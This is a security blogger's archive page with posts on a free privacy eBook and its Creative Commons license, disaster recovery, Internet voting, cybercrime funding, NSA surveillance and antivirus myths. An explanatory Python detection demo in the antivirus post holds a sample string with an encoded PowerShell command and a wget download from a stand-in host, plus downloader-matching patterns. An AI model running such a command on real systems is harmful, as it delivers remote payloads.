Tuesday, May 13, 2014

Privacy for Business: eBook from 2002

I published "Privacy for Business: Web sites and email" in 2002. Much of the content about privacy principles in business is still relevant. You can download the book free of charge in electronic form as long as you respect the copyright and license agreement.

(2016 Update: You might also find this more recent article and privacy white paper helpful.)

By clicking the DOWNLOAD button on this page you agree to abide by the licensing agreement below.
Download Privacy for Business eBook

License for the electronic edition of Privacy for Business: Web Sites & Email

THE ABOVE NAMED WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS PROHIBITED.
BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED TO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.
1. Definitions
  1. "Adaptation" means a work based upon the Work, or upon the Work and other pre-existing works, such as a translation, adaptation, derivative work, arrangement of music or other alterations of a literary or artistic work, or phonogram or performance and includes cinematographic adaptations or any other form in which the Work may be recast, transformed, or adapted including in any form recognizably derived from the original, except that a work that constitutes a Collection will not be considered an Adaptation for the purpose of this License. For the avoidance of doubt, where the Work is a musical work, performance or phonogram, the synchronization of the Work in timed-relation with a moving image ("synching") will be considered an Adaptation for the purpose of this License.
  2. "Collection" means a collection of literary or artistic works, such as encyclopedias and anthologies, or performances, phonograms or broadcasts, or other works or subject matter other than works listed in Section 1(f) below, which, by reason of the selection and arrangement of their contents, constitute intellectual creations, in which the Work is included in its entirety in unmodified form along with one or more other contributions, each constituting separate and independent works in themselves, which together are assembled into a collective whole. A work that constitutes a Collection will not be considered an Adaptation (as defined above) for the purposes of this License.
  3. "Distribute" means to make available to the public the original and copies of the Work through sale or other transfer of ownership.
  4. "Licensor" means the individual, individuals, entity or entities that offer(s) the Work under the terms of this License.
  5. "Original Author" means, in the case of a literary or artistic work, the individual, individuals, entity or entities who created the Work or if no individual or entity can be identified, the publisher; and in addition (i) in the case of a performance the actors, singers, musicians, dancers, and other persons who act, sing, deliver, declaim, play in, interpret or otherwise perform literary or artistic works or expressions of folklore; (ii) in the case of a phonogram the producer being the person or legal entity who first fixes the sounds of a performance or other sounds; and, (iii) in the case of broadcasts, the organization that transmits the broadcast.
  6. "Work" means the literary and/or artistic work offered under the terms of this License including without limitation any production in the literary, scientific and artistic domain, whatever may be the mode or form of its expression including digital form, such as a book, pamphlet and other writing; a lecture, address, sermon or other work of the same nature; a dramatic or dramatico-musical work; a choreographic work or entertainment in dumb show; a musical composition with or without words; a cinematographic work to which are assimilated works expressed by a process analogous to cinematography; a work of drawing, painting, architecture, sculpture, engraving or lithography; a photographic work to which are assimilated works expressed by a process analogous to photography; a work of applied art; an illustration, map, plan, sketch or three-dimensional work relative to geography, topography, architecture or science; a performance; a broadcast; a phonogram; a compilation of data to the extent it is protected as a copyrightable work; or a work performed by a variety or circus performer to the extent it is not otherwise considered a literary or artistic work.
  7. "You" means an individual or entity exercising rights under this License who has not previously violated the terms of this License with respect to the Work, or who has received express permission from the Licensor to exercise rights under this License despite a previous violation.
  8. "Publicly Perform" means to perform public recitations of the Work and to communicate to the public those public recitations, by any means or process, including by wire or wireless means or public digital performances; to make available to the public Works in such a way that members of the public may access these Works from a place and at a place individually chosen by them; to perform the Work to the public by any means or process and the communication to the public of the performances of the Work, including by public digital performance; to broadcast and rebroadcast the Work by any means including signs, sounds or images.
  9. "Reproduce" means to make copies of the Work by any means including without limitation by sound or visual recordings and the right of fixation and reproducing fixations of the Work, including storage of a protected performance or phonogram in digital form or other electronic medium.
2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit, or restrict any uses free from copyright or rights arising from limitations or exceptions that are provided for in connection with the copyright protection under copyright law or other applicable laws.
3. License Grant. Subject to the terms and conditions of this License, Licensor hereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for the duration of the applicable copyright) license to exercise the rights in the Work as stated below:
  1. to Reproduce the Work, to incorporate the Work into one or more Collections, and to Reproduce the Work as incorporated in the Collections; and,
  2. to Distribute and Publicly Perform the Work including as incorporated in Collections.
The above rights may be exercised in all media and formats whether now known or hereafter devised. The above rights include the right to make such modifications as are technically necessary to exercise the rights in other media and formats, but otherwise you have no rights to make Adaptations. Subject to 8(f), all rights not expressly granted by Licensor are hereby reserved, including but not limited to the rights set forth in Section 4(d).
4. Restrictions. The license granted in Section 3 above is expressly made subject to and limited by the following restrictions:
  1. You may Distribute or Publicly Perform the Work only under the terms of this License. You must include a copy of, or the Uniform Resource Identifier (URI) for, this License with every copy of the Work You Distribute or Publicly Perform. You may not offer or impose any terms on the Work that restrict the terms of this License or the ability of the recipient of the Work to exercise the rights granted to that recipient under the terms of the License. You may not sublicense the Work. You must keep intact all notices that refer to this License and to the disclaimer of warranties with every copy of the Work You Distribute or Publicly Perform. When You Distribute or Publicly Perform the Work, You may not impose any effective technological measures on the Work that restrict the ability of a recipient of the Work from You to exercise the rights granted to that recipient under the terms of the License. This Section 4(a) applies to the Work as incorporated in a Collection, but this does not require the Collection apart from the Work itself to be made subject to the terms of this License. If You create a Collection, upon notice from any Licensor You must, to the extent practicable, remove from the Collection any credit as required by Section 4(c), as requested.
  2. You may not exercise any of the rights granted to You in Section 3 above in any manner that is primarily intended for or directed toward commercial advantage or private monetary compensation. The exchange of the Work for other copyrighted works by means of digital file-sharing or otherwise shall not be considered to be intended for or directed toward commercial advantage or private monetary compensation, provided there is no payment of any monetary compensation in connection with the exchange of copyrighted works.
  3. If You Distribute, or Publicly Perform the Work or Collections, You must, unless a request has been made pursuant to Section 4(a), keep intact all copyright notices for the Work and provide, reasonable to the medium or means You are utilizing: (i) the name of the Original Author (or pseudonym, if applicable) if supplied, and/or if the Original Author and/or Licensor designate another party or parties (e.g., a sponsor institute, publishing entity, journal) for attribution ("Attribution Parties") in Licensor's copyright notice, terms of service or by other reasonable means, the name of such party or parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably practicable, the URI, if any, that Licensor specifies to be associated with the Work, unless such URI does not refer to the copyright notice or licensing information for the Work. The credit required by this Section 4(c) may be implemented in any reasonable manner; provided, however, that in the case of a Collection, at a minimum such credit will appear, if a credit for all contributing authors of Collection appears, then as part of these credits and in a manner at least as prominent as the credits for the other contributing authors. For the avoidance of doubt, You may only use the credit required by this Section for the purpose of attribution in the manner set out above and, by exercising Your rights under this License, You may not implicitly or explicitly assert or imply any connection with, sponsorship or endorsement by the Original Author, Licensor and/or Attribution Parties, as appropriate, of You or Your use of the Work, without the separate, express prior written permission of the Original Author, Licensor and/or Attribution Parties.
  4. For the avoidance of doubt:
    1. Non-waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme cannot be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License;
    2. Waivable Compulsory License Schemes. In those jurisdictions in which the right to collect royalties through any statutory or compulsory licensing scheme can be waived, the Licensor reserves the exclusive right to collect such royalties for any exercise by You of the rights granted under this License if Your exercise of such rights is for a purpose or use which is otherwise than noncommercial as permitted under Section 4(b) and otherwise waives the right to collect royalties through any statutory or compulsory licensing scheme; and,
    3. Voluntary License Schemes. The Licensor reserves the right to collect royalties, whether individually or, in the event that the Licensor is a member of a collecting society that administers voluntary licensing schemes, via that society, from any exercise by You of the rights granted under this License that is for a purpose or use which is otherwise than noncommercial as permitted under Section 4(b).
  5. Except as otherwise agreed in writing by the Licensor or as may be otherwise permitted by applicable law, if You Reproduce, Distribute or Publicly Perform the Work either by itself or as part of any Collections, You must not distort, mutilate, modify or take other derogatory action in relation to the Work which would be prejudicial to the Original Author's honor or reputation.
5. Representations, Warranties and Disclaimer
UNLESS OTHERWISE MUTUALLY AGREED BY THE PARTIES IN WRITING, LICENSOR OFFERS THE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING THE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT, OR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.
6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW, IN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
7. Termination
  1. This License and the rights granted hereunder will terminate automatically upon any breach by You of the terms of this License. Individuals or entities who have received Collections from You under this License, however, will not have their licenses terminated provided such individuals or entities remain in full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will survive any termination of this License.
  2. Subject to the above terms and conditions, the license granted here is perpetual (for the duration of the applicable copyright in the Work). Notwithstanding the above, Licensor reserves the right to release the Work under different license terms or to stop distributing the Work at any time; provided, however that any such election will not serve to withdraw this License (or any other license that has been, or is required to be, granted under the terms of this License), and this License will continue in full force and effect unless terminated as stated above.
8. Miscellaneous
  1. Each time You Distribute or Publicly Perform the Work or a Collection, the Licensor offers to the recipient a license to the Work on the same terms and conditions as the license granted to You under this License.
  2. If any provision of this License is invalid or unenforceable under applicable law, it shall not affect the validity or enforceability of the remainder of the terms of this License, and without further action by the parties to this agreement, such provision shall be reformed to the minimum extent necessary to make such provision valid and enforceable.
  3. No term or provision of this License shall be deemed waived and no breach consented to unless such waiver or consent shall be in writing and signed by the party to be charged with such waiver or consent.
  4. This License constitutes the entire agreement between the parties with respect to the Work licensed here. There are no understandings, agreements or representations with respect to the Work not specified here. Licensor shall not be bound by any additional provisions that may appear in any communication from You. This License may not be modified without the mutual written agreement of the Licensor and You.
  5. The rights granted under, and the subject matter referenced, in this License were drafted utilizing the terminology of the Berne Convention for the Protection of Literary and Artistic Works (as amended on September 28, 1979), the Rome Convention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances and Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised on July 24, 1971). These rights and subject matter take effect in the relevant jurisdiction in which the License terms are sought to be enforced according to the corresponding provisions of the implementation of those treaty provisions in the applicable national law. If the standard suite of rights granted under applicable copyright law includes additional rights not granted under this License, such additional rights are deemed to be included in the License; this License is not intended to restrict the license of any rights under applicable law.

Monday, April 28, 2014

Business Continuity Management: Sounds boring yet saves lives, companies, butts

Lately, I've been revisiting an area of information security into which I have dived deeply on several occasions over the years: Disaster Recovery, which is pretty much the same as Business Continuity Management or BCM, which includes Business Continuity Planning (BCP). Along the way I have assembled a list of high quality BCM resources and articles that folks might find useful (and available for free in most cases). You will find the list at the end of this article. Here's a scene-setting quote from one of the articles:
Disasters can strike at any time – often with little or no warning – and the effects can be devastating. The cost in human lives and property damage is what makes the evening news because of the powerful tug of human interest. Much less coverage, however, is given to the disruption, struggle and survivability of business operations. A study fielded by the Institute for Business and Home Safety revealed that 25 percent of all companies that close due to disasters – hurricanes, power failures, acts of terror and others – never reopen. (Disaster Preparedness Planning: Maintaining Business Continuity During Crisis, Disruption and Recovery)

Monday, April 14, 2014

Internet voting security: a scary tweet that reached 227,391 (even before Heartbleed)

Last month I tweeted a picture of some computer code that was part of an Internet voting system. That picture was re-tweeted so many times it reached more than 220,000 Twitter users. So, that had to be some pretty amazing code, right? Yes, as in amazingly frightening. Take a look, and then read on for a short explanation, and also a long one if you have the time.

A very clever computer scientist, Joe Kiniry, has been concerned about the security of Internet voting applications for some time. Joe is a former Technical University of Denmark professor, now Principal Investigator at Galois. In his research Joe noted this section of code in a program that was actually used for national elections in a European country.

The coder(s) have included a comment reminding themselves that security checks still need to be coded. My tweet suggested that this slide nicely illustrated the question of “what could possibly go wrong?” when it comes to Internet voting. Of course, the best answer to that question is: So much could go wrong you simply cannot use the Internet to elect public officials in a fair, honest, secret ballot!

Sunday, January 19, 2014

A call to action we ignore at our peril

You don't have to watch all of this video to know that Josh Corman has clearly articulated the massive scope of the IT security challenges we face today, and he has done it using language that even a CEO or a Middle School teacher can understand. I think the whole thing is worth watching, but if you cut to minute 15 you get to the crux of the matter:
"Our dependence on technology is growing faster than our ability to secure it....Issues of public safety and public concern require public discussion and public solutions...We are going to be the ambassadors of technical literacy."
My commitment to my ambassadorial duties is my New Year resolution. Let the educational outreach begin.

Thursday, January 16, 2014

The Privacy Meter Redux

My prediction that data privacy is going to be a hot topic in 2014 was not surprising, but I am surprised at how many interview requests I've had so far, and we're barely halfway through January. Yesterday I found myself filling a last minute request to appear on a local TV channel. So I dusted off the trusty privacy meter.
The Privacy Meter
I created this learning device in 2001 and it went into my privacy book that came out in 2002. And it is just a visual device, an image to use as a tool when discussing privacy. (Feel free to use it, you have my permission, it is released to the public domain.)

The idea is to ask people to self-assess where they fit on a scale from closed book to open book. They do not need to reveal their "privacy reading" but they do need to think about whether or not it is fair to impose their position on others.

In other words, there is no correct reading, but plenty of scope to use the meter as a basis for discussion. For example, suppose you are an open book. Is it fair to make others become open book about their personal data if they prefer to be more of a closed book? On the other hand, if you think you are a closed book, are you prepared to provide information about yourself in order to authenticate your identity and establish trust?

Saturday, January 11, 2014

Why there is so much cyber crime: #1 It's our spending priorities

With the number of potential victims of the Target data breach now topping 100 million, a lot of people who have never really given much thought to cyber crimes are asking: Why? How is it that criminals can commit computer crime on this scale with apparent impunity? After all, we pay taxes to be protected from the kind of scum that perpetrate crimes like this.

There are a number of answers to the question "why is there so much cyber crime?" But for me, the first answer on the list, the one that has been ignored by most of the talking heads who've been hashing over the scant details of the Target breach on TV, looks like this:
Despite all the hot air from politicians over the last 15 years, repeatedly pledging to do something about computer crime, the U.S. has failed to make fighting cyber crime a priority. I think these relative spending numbers make that clear. I would love to hear anyone argue that we are spending enough money to track down and prosecute cyber criminals right now.

An academic study published in 2012 put the total U.S. law enforcement spend on the fight against cyber crime at $200 million per year. I decided to be generous in my chart and rounded it up to $250 million.

The figure of $15 billion is often cited as the annual cost of the war on drugs, so apparently that is 60X more important than cyber crime. We know from the Snowden revelations that spy agencies spend over $52 billion per year, so apparently we think that what they do is 200X more important than fighting cyber crime.

How about we shave $0.5 billion off the intelligence agency budgets and spend it on bringing cyber criminals to justice? That's a 3X increase over what we spend right now. That might well be enough to put a significant number of perpetrators behind bars, including the ones we could afford to bring to the U.S. from other countries, thereby tipping the risk/reward equation against the bad guys and in the favor of honest citizens.

I'm writing to my representatives in Washington to tell them what I think our priorities should be. I'm sending them this chart. If you agree, I invite you to send it to the folks who are supposed to be representing you.

Thursday, January 02, 2014

My #4 personal privacy and security prediction for 2014: A BIG year for good/bad news

As we enter 2014 it is clear that two events in 2013 have rocketed data privacy and information security to the highest level of public awareness that these complex topics have ever attained. I'm talking about the Snowden revelations and the Target breach.

For me, this surge in public awareness of the importance of data privacy and cybersecurity is both exciting and frightening. Why? Because 2014 is obviously going to be a big year for those of us who work in these closely intertwined fields, a year when more people than ever before will be concerned about securing their data, yet more distrustful than ever of the folks who are trying to help them do that (among whom I count myself).

Consider that I have spent the better part of 20 years writing and speaking about these issues, starting with computer security, then network security, system security, information assurance, data privacy, and now "cybersecurity." You could say that I have wanted nothing more than to make the world aware of the importance of these things, for the simple reason that, without such awareness, the true potential of digital technology will never be realized.

Let me put it a different way: Are you wondering where the flying cars are? Are you disappointed that in 2014 we don't yet have them, or transoceanic high speed rail service, or the handheld medical scanner that can diagnose the top 100 medical conditions in a single swipe? I believe we would have achieved these or similar technological marvels by now if it were not for the massive distraction of information insecurity.

I don't want to wander off into too many examples, but consider one: Towards the end of the last century email was poised to become a universal tool for managing transactions cheaply and easily. Then came the spam-plosion, a massive surge in unsolicited commercial email that rose to become 80% or more of all email and had Internet service providers (ISPs) buying new servers once a fortnight just to maintain legitimate service. Combine that with the inability of the major email providers to agree on improvements to email protocols, and you have the death of transactional email that is still hampering large slices of our economy, like banking, healthcare, government, and retail.

So the good news / bad news in 2014 goes like this:
  • Are most consumers now aware that cybercrime is a serious problem? Yes. Can a young working mother buy diapers at a discount store without fear of losing her identity, and all the money in her bank account, despite the billions that have been spent on cybersecurity? No, because we have grossly under-funded the vital work of catching the cyber-scum at the root of that fear.
  • Are most companies now aware that cybercrime is a serious problem? Yes. Can a company develop new products without fear of them leaking from their computers to a nation state agency and/or its clients? No, because it is possible that every piece of hardware and software you buy to build your dreams has already been hacked, back-doored, or otherwise compromised, thanks in part to your own tax dollars at work (see this article or the pictures here if you are not clear on this).
Now this next bit may sound self-serving, but I assure you it is not. I am employed by a company that sells security software, some of which requires root access in order to protect systems. However, the company doesn't pay me to sell this software, they pay me to think about security and privacy and explain as much of this stuff as I can to as many people as possible. The company has, in my considered opinion as a 20-year industry veteran, the very highest ethical standards. All of the people that I work with, in this company and in many of our leading competitors, are dedicated to eliminating the scourge of malware and other threats perpetrated by the world's cyber-scum. A fair number of us have been at this for 10 or 20 years or more. Yet today, in 2014, we are being asked: "Are you helping the government spy on its people?"

The answer is no, but although part of me feels hurt and even insulted by this line of questioning, objectively speaking I cannot object, particularly when I see these pages from a catalog of hardware and software crippled by the NSA, in other words, produced by my own government. I am sure that the people who developed these things thought they were doing the right thing, and only intended them to be used for righteous purposes like defending our nation. But the people in charge clearly failed to consider what would happen to the nation when the world found out about them.

I bet you a box of donuts that in 2014 at least one person will ask me where they can get a USB cable that is certified uncompromised. The fact that I don't have a good answer really bothers me. More people than ever before are going to be asking security professionals for help in creating secure systems, even as those professionals try to deal with NSA-fueled doubts about the very building blocks of such systems. One way or another, or both, it's going to be a BIG year.

Wednesday, January 01, 2014

My #3 personal privacy and security prediction for 2014: Cyber won't be icky any more

I predict, and sincerely hope, that in 2014 most of us information security professionals will stop apologizing whenever we use the letters c-y-b-e-r like in cyber crime, or cyber security. I also predict/hope we will stop putting "cyber" in ironic air quotes or pronouncing it in a snide tone that implies we are above using words that the world has thrust upon us.

Let's face it, computers, networks, information systems, endpoints, digital devices, tablets, smartphones, Internet-enabled-DVD-players, Bluetooth insulin pumps, they are all cyber.

So computer security, network security, information system security, endpoint security, digital device security, tablet security, smartphone security, Internet-enabled-DVD-player security, Bluetooth insulin pump security, they are all cyber security, or cyber-security, or cybersecurity.

In 2014 we are going to have to answer a lot of questions about the security of digital information. In our answers we can call it digital security, or refer to "the security of all things digital", but it is also okay to say cyber security. And referring to the bad guys as cyber criminals is a lot easier than saying "those who would subvert any or all things digital with criminal intent."

In 2013 there were times when I said things like cyber scammers and cyber scum as well as cyber criminals. I'm not going to apologize for that because I think the general public gets what cyber means. It means all things digital, it means my data and the devices and systems that process and store them. Cyber security is about protecting that stuff. Let's save our erudition and expository powers for the many other, more complex and nuanced concepts that will need to be explained in 2014, like why public key encryption needs private keys, and what pseudo random number generators have done for us lately.

Sunday, December 15, 2013

My #2 personal privacy and security prediction for 2014: NSA-GCHQ-NRO will dominate

Here is another of the privacy and security predictions I am making for 2014. This is in addition to the ones I contributed to We Live Security where I had the honor of presenting predictions from my fellow researchers at ESET. Note that the following are my personal opinions, which may differ from those of my employer (although my employer has some pretty cool opinions).

The #1 privacy and security story in 2014 will be the NSA

Snowden-sourced papers will continue to leak, further revealing just how thoroughly America's National Security Agency has pursued the goal set by its leadership: make sure no piece of information about any person anywhere is beyond reach. While the NSA has dominated much of the privacy and security news in 2013, the story may evolve into a triple play in 2014, with GCHQ on one side, NRO on the other.

The National Reconnaissance Office has already made a big play for attention with its latest spy satellite, NROL-39, launched in early December sporting a logo that many pundits will claim says it all: NOTHING IS BEYOND OUR REACH.

While NSA and GCHQ are initials known to millions around the world, the NRO has lurked in the shadows, despite having a budget about the same size as the NSA; that's $10.3 billion and $10.8 billion, for the NRO and NSA respectively for 2013, according to the Washington Post.

Note that in the mid-1990s the budgets were $6 billion and $3.6 billion, with NRO spending far-outpacing the NSA and CIA.

Expect someone to put more detailed spending numbers together as the work of these agencies comes under increased scrutiny in 2014. For example, all three have a history of using military employees who are paid out of their respective armed forces budgets. So the total U.S. spend on surveillance and code-breaking activities may be more than has yet been reported.

If the NROL-39 logo is any indication, very little of the NRO budget has gone into public relations and incident response planning. It is hard to imagine more disastrous imagery and sloganeering for a spy satellite launched post-Snowden. No wonder that within a few days we heard loud and clear from the world's technology giants demanding global surveillance reform. (A topic I discussed recently over on Tech Republic.)

My #1 personal privacy and security prediction for 2014: Antivirus will be slandered, again

Here is one of the privacy and security predictions I am making for 2014. This is in addition to the ones I contributed to We Live Security where I had the honor of presenting predictions from my fellow researchers at ESET. Note that the following are my personal opinions, which may differ from those of my employer (although my employer has some pretty cool opinions).

The media will repeat a massive lie about antivirus technology

I predict that in 2014 every major newspaper and magazine will perpetuate, to the detriment of data security and human understanding, the grossly erroneous notion that "for an antivirus firm to spot malware, it first needs to have seen the malware, recognized that it's malicious code, and written a corresponding virus signature for its products."

I predict that, although this assertion is simply not true, and has not been true for many years, that fact will not deter people from repeating it, over and over. This is a bit like Car and Driver or Consumer Reports saying that cars cannot be started without first engaging the crank handle.

True, there was a time, long ago, when crank handles were routinely used to start cars, just as some antivirus programs were, in the distant past, based solely on signatures derived from known bad code. I've got a free t-shirt and more for the first mainstream journalist who breaks rank from the ill-informed herd and points out that any AV app worthy of the name today uses a lot more than signature matching to protect systems from malicious code. 
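To make the crank-handle point concrete, here is a small added illustration (my own demo code, not anything from an AV product) of what "signature matching" alone buys you versus one of the simpler layers that sits on top of it. The "files" are constructed byte strings and the heuristic rules and weights are invented for the demo: a hash-based signature catches only the exact sample it was written for, while a content heuristic still flags a variant the attacker changed by a single byte.

```python
import hashlib
import re
from typing import Dict, List, Tuple

# Constructed sample "files" standing in for real binaries (demo data, not real malware).
KNOWN_BAD = b"MZ\x90\x00 cmd.exe /c powershell -enc SQBFAFgA wget http://bad.example/p.exe"
VARIANT = KNOWN_BAD + b"\x00"  # attacker appends one byte: the hash changes, behaviour does not
BENIGN = b"MZ\x90\x00 This program cannot be run in DOS mode. Hello, world!"
BENIGN_WITH_URL = b"Release notes: see http://docs.example/changelog for details"


def sha256_signature(data: bytes) -> str:
    """Classic exact-match 'signature': the hash of the whole sample."""
    return hashlib.sha256(data).hexdigest()


# The signature database only ever contains samples the vendor has already seen.
SIGNATURE_DB = {sha256_signature(KNOWN_BAD)}


def signature_match(data: bytes) -> bool:
    return sha256_signature(data) in SIGNATURE_DB


# Invented heuristic rules: (pattern, weight, label). Real engines use far richer
# static, emulation and behavioural layers; this is only the idea.
HEURISTICS: List[Tuple[bytes, int, str]] = [
    (rb"powershell\s+-enc", 3, "encoded PowerShell command line"),
    (rb"\b(wget|curl|Invoke-WebRequest)\b", 2, "downloader utility referenced"),
    (rb"cmd\.exe\s+/c", 1, "shell spawning"),
    (rb"https?://", 1, "embedded URL"),
]


def heuristic_score(data: bytes) -> Tuple[int, List[str]]:
    """Score the sample on generic suspicious traits, no prior sighting required."""
    score = 0
    reasons: List[str] = []
    for pattern, weight, label in HEURISTICS:
        if re.search(pattern, data, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons


def scan(data: bytes, threshold: int = 4) -> Dict[str, object]:
    """Combine both layers: exact signature OR heuristic score above threshold."""
    sig = signature_match(data)
    score, reasons = heuristic_score(data)
    verdict = "malicious" if sig or score >= threshold else "clean"
    return {"signature": sig, "heuristic_score": score, "reasons": reasons, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in [("known", KNOWN_BAD), ("variant", VARIANT),
                         ("benign", BENIGN), ("benign+url", BENIGN_WITH_URL)]:
        print(name, scan(sample))
```

The one-byte variant never hits the signature database, which is exactly the scenario the "must have seen it first" claim describes, yet it scores 7 on the heuristic layer and is convicted anyway; the benign file with a URL scores 1 and stays clean, which is why weights and a threshold matter more than any single indicator.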

(With huge hat tip to the guys in Norway who posted that YouTube video of a hand-crank start: they are braver men than me; I've seen how much pain a crank handle can cause.)

Saturday, October 12, 2013

Free professional security advice for Palestinian hackers

First of all, welcome. I am glad you found this page. Please don’t hack it.

Who am I? I am a computer security professional with over 20 years experience, just one of many people in the computer security world who have great sympathy for the Palestinian people. We agree with you that the Palestinian people deserve to live in peace. We let our politicians know what we think. We use social media to spread news and awareness of the injustices suffered by the Palestinian people at the hands of Western governments and their allies in the region (for example, see my pins of infographics about the Occupation).

As computer security professionals, we also work hard to protect the privacy and cybersecurity of hundreds of millions of individuals around the world. Some of those people are Palestinians. For example, I work at ESET, a company which protects the computers and smartphones of many millions of people in more than 180 different countries. I'm guessing some of them are Palestinian sympathizers.

Tuesday, September 03, 2013

More information security articles from Stephen and Michael

Here's an update on the information security stuff we've been writing. Three articles from SearchSecurity by Mike and a link to my archive on We Live Security.

Saturday, March 30, 2013

Criminal hackers force down volunteer site serving hemochromatosis help

Just a quick note to say that the website I created at CelticCurse.org is offline at the moment due to compromise by illegal access. It looks like criminal hackers forced their way into the server that hosts the site and installed their own code to launch DDoS attacks.

If you are not familiar with the site, it is an entirely volunteer project that serves up information and resources for people with hemochromatosis, a potentially fatal genetic disorder that affects millions around the world. Due to low awareness in the medical community hemochromatosis is widely under-diagnosed and often poorly treated, leading to a lot of needless pain and suffering.

I am working to restore the site, but in the meantime people who need more information about hemochromatosis can visit:
If you want THE book on hemochromatosis, we highly recommend:

Guide to Hemochromatosis

Monday, March 25, 2013

More security articles from Michael Cobb, CISSP-ISSAP

Sunday, October 07, 2012

More Cobbs on Information Security: Selected articles by Stephen & Michael

As you may know from my previous post, my first book on computer security was published in 1992. That led to an invitation to speak at the 1994 Virus Bulletin conference, and in 1996 I was one of the first people to pass the CISSP exam. A few years later, my brother Michael Cobb, became an MCDBA and then a CISSP, and later a CISSP-ISSAP.

Michael, who also writes as Mike Cobb, is also CLAS (stands for the UK's CESG Listed Advisor Scheme--CLAS consultants play a key role in providing Information Assurance advice to government departments and other organisations that provide services for the government.)

Over the years Mike and I have written and spoken a lot about security. We've taught a lot of security classes, and delivered a host of security and privacy themed seminars, podcasts, and webcasts. Right now I am working up the strength to create a library of links to as many of these as I can find online. But in the meantime, here are 5 recent items from each of us.

Michael's List

Mike (Michael) Cobb, CISSP, writes for a variety of publications, including SearchSecurity and Dark Reading. Here are 5 recent articles:
  1. Measuring Risk: A Security Pro's Guide
  2. Evaluating and Choosing Threat Intelligence Tools
  3. When To Outsource Security - And When Not To
  4. How Did They Get In? A Guide To Tracking Down The Source Of An APT 
  5. How To Detect And Defend Against Advanced Persistent Threats 

Stephen's List

I write for the ESET Threat Blog as well as my own blog and SC Magazine's Cybercrime Corner. Here are 4 widely read items and an index of my posts from the ESET blog:
  1. Data security and digital privacy on the road, what travelers should know 
  2. FBI Ransomware: Reveton seeks MoneyPak payment in the name of the law
  3. Malware RATs can steal your data and your money, your privacy too
  4. Privacy and Security in the Consumer Cloud: The not so fine print
  5. Library of Stephen Cobb's articles on the ESET Threat Blog 
I hope you find this material helpful.

Sunday, July 22, 2012

Cobb's PC and LAN Security: 20th anniversary of publication (available as a free download!)

The Stephen Cobb Complete Book of PC and LAN Security first appeared in print in 1992, an amazing 20 years ago. In celebration of this anniversary, I'm publishing a PDF copy of the most recent version of the book, freely downloadable under a Creative Commons license. The large file size of this 700 page tome led me to publish it in three easily digestible parts: Part One; Part Two; and Part Three. (Yes, my organizational skills are legendary.)

Despite the title, which was imposed by the publisher, the volume that appeared 20 years ago was by no means a "complete book" on the subject; nor is it now a contemporary guide. However, you can still find it on Amazon, even though Amazon.com did not exist when the first version was published. The images immediately on the right are the current Amazon listings of the three versions (which I will explain shortly).

If you are inclined to take this particular trip down computer security's memory lane, I suggest you download the free electronic version rather than purchase on Amazon. On that trip you will find a few items of note, such as this:
The goal of personal computer security is to protect and foster the increased creativity and productivity made possible by a technology that has so far flourished with a minimum of controls, but which finds itself increasingly threatened by the very openness that led to its early success. To achieve this goal, you must step from an age of trusting innocence into a new era of realism and responsibility, without lurching into paranoia and repression.
I'd say that's a decent piece of prognostication for 1992. It's one of the reasons I have kept the book available all these years, a mix of nostalgia and history. At some point in the future it might be interesting to see what computer security looked like in the late 20th century.

Three Versions and a Free Version

I made a lot of changes when I turned that 1992 volume into The NCSA Guide to PC and LAN Security--a 700 page paperback that was published in 1995--but that edition is also very outdated these days. Around 12 years ago I obtained the copyright to these works and, through an arrangement with the Authors Guild, got it reprinted as Cobb's Guide to PC and LAN Security. This was done largely for sentimental reasons and the copies are only printed on demand. However, in that process I obtained a high resolution scan of the entire book. I then converted this to text using Adobe OCR software. The result is what I have put online. (Warning: you may encounter OCR errors and artifacts; no claims are made as to accuracy of the information in this document; use at your own risk and discretion).
LEGAL STUFF: THIS FREE ELECTRONIC EDITION IS LICENSED BY THE AUTHOR FOR USE UNDER CREATIVE COMMONS, ATTRIBUTION, NONCOMMERCIAL, NO DERIVATIVES.

Computer Security Prognosis and Predictions 

I plan to post more thoughts on computer security "then and now" but for now I leave you with another quote from the 1992 Stephen Cobb Complete Book of PC and LAN Security:
